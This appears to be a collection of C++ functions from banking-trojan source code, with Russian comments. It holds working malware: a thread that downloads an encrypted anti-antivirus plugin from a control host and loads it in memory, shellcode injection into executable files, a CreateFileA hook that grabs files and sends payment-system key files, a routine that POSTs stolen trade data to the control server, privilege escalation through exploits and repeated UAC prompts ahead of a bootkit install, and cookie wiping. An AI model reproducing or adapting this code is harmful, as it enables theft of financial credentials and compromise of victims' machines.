int DeleteIECookies(int os, HCAB hCab) { char username[256]; DWORD name_len = 256; if(!(BOOL)pGetUserNameA(&username[0], &name_len)) return 0; //return 10; char *Path_cookies = NULL; switch(os) { case 1: Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies")); m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\"); m_lstrcat(Path_cookies,&username[0]); m_lstrcat(Path_cookies,"\\Cookies\\"); break; case 2: Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies")); m_lstrcpy(Path_cookies,"C:\\Users\\"); m_lstrcat(Path_cookies,&username[0]); m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\"); break; default: return -1; } DeleteFiles(Path_cookies, "*.txt", true, false, hCab); /* if(Path_cookies == NULL) return -1; WIN32_FIND_DATA data; char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2); m_lstrcpy(Path_cookies_find,Path_cookies); m_lstrcat(Path_cookies_find,"\\*"); HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data); if(nFindFile==NULL) return -1; do { if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue; char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1); m_lstrcpy(Path_file,Path_cookies); m_lstrcat(Path_file,"\\"); m_lstrcat(Path_file,data.cFileName); if(!DeleteFile(Path_file)) { DWORD err = pGetLastError(); } //MemFree(Path_file); } while(FindNextFile(nFindFile,&data)); FindClose(nFindFile); //MemFree(Path_cookies);*/ return 0; }
bool GetDriverUrl(char * UrlBuffer, DWORD UrlBufferSize) { DebugReportSettings* settings = DebugReportGetSettings(); DBGRPTDBG("GetDriverUrl", "Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'", settings->Enabled, settings->StatPrefix, settings->StatUrl ); if (!settings->Enabled) return false; string BotUid = GenerateUidAsString(settings->StatPrefix); m_memset(UrlBuffer, 0, UrlBufferSize); PStrings Fields = Strings::Create(); AddURLParam(Fields, "cmd", "step"); AddURLParam(Fields, "uid", BotUid.t_str()); AddURLParam(Fields, "step", "170_dr"); //170_dr таймер драйвера PCHAR Params = Strings::GetText(Fields, "&"); PCHAR URL = STR::New(2, settings->StatUrl, Params); DBGRPTDBG("GetDriverUrl", "Url='%s':%u (buffer_size=%u)", URL, STR::Length(URL), UrlBufferSize); if (UrlBufferSize < (STR::Length(URL) - 1)) return false; m_lstrcpy(UrlBuffer, URL); STR::Free(URL); STR::Free(Params); Strings::Free(Fields); DebugReportFreeSettings(settings); return true; }
DWORD WINAPI AvBlockThread( LPVOID lpData ) { if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES ) { return 0; } char *Host = GetCurrentHost(); if ( Host == NULL ) { return 0; } char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0}; char AvBlockUrl[256]; m_lstrcpy( AvBlockUrl, Host ); m_lstrcat( AvBlockUrl, AvBlockFile ); LPBYTE BotModule = NULL; DWORD dwModuleSize = 0; while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL && dwModuleSize ) { LPVOID FileData = MemAlloc( dwModuleSize + 1 ); if ( FileData ) { m_memcpy( FileData, BotModule, dwModuleSize ); File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize ); MemFree( FileData ); } LPVOID Module = DecryptPlugin( BotModule, dwModuleSize ); if ( Module ) { HMEMORYMODULE hLib = MemoryLoadLibrary( Module ); if ( hLib == NULL ) { return 0; } MemoryFreeLibrary( hLib ); } } return 0; }
HANDLE WINAPI Hook_CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ) { HANDLE File = Real_CreateFileA(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile ); if( (stateGrabber & IGNOREHOOK) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //игнорируем открытие разных портов { //DBG("FileGrabberA", "%s", lpFileName); //инициализация параметров события ParamEvent e; e.data = 0; e.szData = 0; m_lstrcpy( e.fileNameA, lpFileName ); e.unicode = false; e.access = dwDesiredAccess; e.file = File; SendEvent(e); //посылаем событие } return File; }
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine ) { DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode); DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; DBG( "Shellcode size is %d bytes", totalSize); PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS) ((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew); PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER) (headers->FileHeader.SizeOfOptionalHeader + (PUCHAR)&headers->OptionalHeader); DWORD numberOfSections = headers->FileHeader.NumberOfSections; // enumerate sections for( int i = 0; i < (int)numberOfSections; i++ ) { // check for resources section if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) ) { if( section->SizeOfRawData < totalSize ) { DBG( "ERROR: Not enough free space in '.rsrc'" ); return false; } // fill shellcode parameters PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData); m_memset( params, 0, sizeof(SHELLCODE_PARAMS) ); params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint; HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll"); params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" ); params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" ); if( commandLine ) m_lstrcpy( params->szCommandLine, commandLine ); m_lstrcpy( params->szDllPath, dllPath ); // copy shellcode PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1); m_memcpy( shellcode, Shellcode, shellcodeSize); // replace address of entry point headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; // make section executable section->Characteristics |= IMAGE_SCN_MEM_EXECUTE; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0; DWORD headerSum = 0, checkSum = 0; // recalculate checksum if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) ) headers->OptionalHeader.CheckSum = checkSum; else DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() ); DBG( "OK" ); break; } section++; } return true; }
//true - если файл является файлом ключем static int GrabKeyFiles( FileGrabber::ParamEvent* e ) { DBG( "Cyberplat", "File: %s", e->fileName ); m_lstrcpy( e->nameSend, "file.key" ); return FileGrabber::SENDFILE | FileGrabber::STOPRECEIVER;; }
/************************************************************************/ //* Надо ещё сделать парную для MemAlloc очистку памяти в этой процедуре*/ BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex) { DbgMsg("Delete_IECookies_Norm",0,"START"); char szUserProfile[200]; char szFilePath[200]; HANDLE hCacheEnumHandle = NULL; LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL; DWORD dwSize = 4096; // initial buffer size // Delete index.dat if requested. Be sure that index.dat is not locked. if(bDeleteCookiesIndex) { // Retrieve from environment user profile path. pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0], sizeof(szUserProfile)); m_memset(&szFilePath[0], 0, sizeof(szFilePath)); //m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR)); //m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36); m_lstrcpy(&szFilePath[0], &szUserProfile[0]); m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat"); // wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat"); m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat"); pDeleteFileA(szFilePath); DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]); DWORD err = pGetLastError(); DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW"); if(!bDeleteCookies) return TRUE; } // Enable initial buffer size for cache entry structure. //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // URL search pattern (1st parameter) options are: "cookie:", "visited:", // or NULL ("*.*"). hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */, lpCacheEntry /* out */, &dwSize /* in, out */); // First, obtain handle to internet cache with FindFirstUrlCacheEntry // for late use with FindNextUrlCacheEntry. if(hCacheEnumHandle != NULL) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); } else { switch(pGetLastError()) { case ERROR_INSUFFICIENT_BUFFER: MemFree(lpCacheEntry); //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // Repeat first step search with adjusted buffer, exit if not // found again (in practice one buffer's size adustment is // always OK). hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize); if(hCacheEnumHandle != NULL) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); break; } else { // FindFirstUrlCacheEntry fails again, return. MemFree(lpCacheEntry); return FALSE; } default: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } } // Next, use hCacheEnumHandle obtained from the previous step to delete // subsequent items of cache. do { // Notice that return values of FindNextUrlCacheEntry (BOOL) and // FindFirstUrlCacheEntry (HANDLE) are different. if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize)) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); } else { switch(pGetLastError()) { case ERROR_INSUFFICIENT_BUFFER: //lpCacheEntry = //(LPINTERNET_CACHE_ENTRY_INFO); MemFree(lpCacheEntry); //new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // Repeat next step search with adjusted buffer, exit if // error comes up again ((in practice one buffer's size // adustment is always OK). if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize)) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); break; } else { // FindFirstUrlCacheEntry fails again, return. pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } break; case ERROR_NO_MORE_ITEMS: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return TRUE; default: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } } } while (TRUE); return FALSE; // never here }
// Ф-ция, которая вызывается при инжекте в другие процессы. // Проверяет свои права и пробует их расширить для DWORD WINAPI ExplorerRoutine( LPVOID lpData ) { // // Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты. // BOOL bRun = TRUE; BOOL bRet = FALSE; BOOL IsUsedExploit = FALSE; OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0}; UnhookDlls(); BuildImport((PVOID)GetImageBase()); PP_DPRINTF(L"ExplorerRoutine: started"); if (! IsUserAdmin() ) { PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges."); switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun); IsUsedExploit = TRUE; // По идее это всегда TRUE }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet); } /* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */ if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) ) { PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges"); IsUsedExploit = TRUE; switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet); } }; pGetVersionExA(&OSVer); /* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */ if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5)) { PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit"); DWORD DropSize = 0; PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize); if ( DropImage && DropSize) { PCHAR DropFile = File::GetTempNameA(); File::WriteBufferA(DropFile,DropImage,DropSize); SpoolerBypass(DropFile); STR::Free(DropFile); }; }; /* Запуск много раз копии дропера с прошением повышенных прав. */ if ( bRet == FALSE ) { PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle"); PCHAR tmpexe,dir,file ; PCHAR tmp_manifest; PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX"); if ( NamePrefix ) do { tmpexe = File::GetTempNameA(); tmp_manifest = STR::Alloc(MAX_PATH+1); dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ; file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ; if ( tmp_manifest && dir && file) { STR::Free(tmpexe); tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe"); if ( ! tmpexe ) return 0; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest,".manifest"); }; if ( tmpexe && tmp_manifest ) if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) ) { DWORD dwCode = -1; SHELLEXECUTEINFOA ExecInfo; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest," "); m_lstrcat(tmp_manifest,ARGV_UAC_RUN); ExecInfo.cbSize = sizeof(ExecInfo); ExecInfo.lpFile = tmpexe; ExecInfo.lpParameters = tmp_manifest; ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; for ( int i = 0; i < 10; ++i ) { PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest); if ( pShellExecuteExA(&ExecInfo) == FALSE ) break; pWaitForSingleObject(ExecInfo.hProcess,INFINITE); pGetExitCodeProcess(ExecInfo.hProcess,&dwCode); if ( dwCode == 0 ) { PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest); break; } } }; if ( tmpexe ) STR::Free(tmpexe); if ( tmp_manifest ) STR::Free(tmp_manifest); if ( dir ) STR::Free(dir); if ( file ) STR::Free(file); } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита if ( NamePrefix ) STR::Free(NamePrefix); }; /* Если инстал был не удачный снова пробуем вдруг повезет*/ if ( bRet == FALSE) { PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet); } /* Удаляем дропер */ PP_DPRINTF(L"ExplorerRoutine: Start to delete droper"); pCloseHandle(StartThread(DeleteDropper,NULL)); if ( dwExplorerSelf ) { PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()"); pExitProcess(0); } return 0; }
bool SendTradeInfo( char *Buffer ) { string Serv = GetActiveHost(); if ( Serv.IsEmpty()) return 0; char Host[30]; m_lstrcpy( Host, Serv.t_str()); char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0}; char Args[] = "id=%s&data=%s"; char Request[] = "POST %s HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Accept: text/html\r\n" "Connection: Close\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\n"; char Uid[100]; GenerateUid( Uid ); char *Data = URLEncode( Buffer ); char *PartReq = (char*)MemAlloc( 1024 ); typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); if ( PartReq == NULL ) { return false; } _pwsprintfA( PartReq, Args, Uid, Data ); char *Header = (char*)MemAlloc( 1024 ); if ( Header == NULL ) { MemFree( PartReq ); return false; } char *UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); _pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) ); MemFree( UserAgent ); char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 ); if ( SendBuffer == NULL ) { MemFree( PartReq ); MemFree( Header ); return false; } m_lstrcpy( SendBuffer, Header ); m_lstrcat( SendBuffer, PartReq ); m_lstrcat( SendBuffer, "\r\n" ); MemFree( Header ); MemFree( PartReq ); SOCKET Socket = MyConnect( Host, 80 ); bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) ); pclosesocket( Socket ); MemFree( SendBuffer ); return Ret; }
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize ) { WSADATA wsa; if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 ) { return false; } char *Host = NULL; char *Path = NULL; int Port = 80; if ( !ParseUrl( Url, &Host, &Path, &Port ) ) { return false; } SOCKET Socket = MyConnect( Host, Port ); if( Socket == -1 ) { return false; } char *UserAgent = NULL; UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); char *query=(char*)MemAlloc(2048); m_lstrcpy(query,"GET /"); m_lstrcat(query,Path); m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n "); m_lstrcat(query,"Accept-Language: ru \r\n"); m_lstrcat(query,"UA-CPU: x86 \r\n"); m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n"); m_lstrcat(query,"User-Agent: "); m_lstrcat(query,UserAgent); m_lstrcat(query,"\r\nHost: "); m_lstrcat(query,Host); m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n"); bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) ); MemFree( Host ); //MemFree( Path ); MemFree( UserAgent ); MemFree( query ); if ( !b ) { return false; } DWORD dwSizeFile = 0; char *Buffer = RecvAndParse( Socket, &dwSizeFile ); if ( !Buffer ) { pclosesocket( Socket ); return false; } if ( dwSize ) { *lpBuffer = (LPBYTE)Buffer; *dwSize = dwSizeFile; return true; } return false; }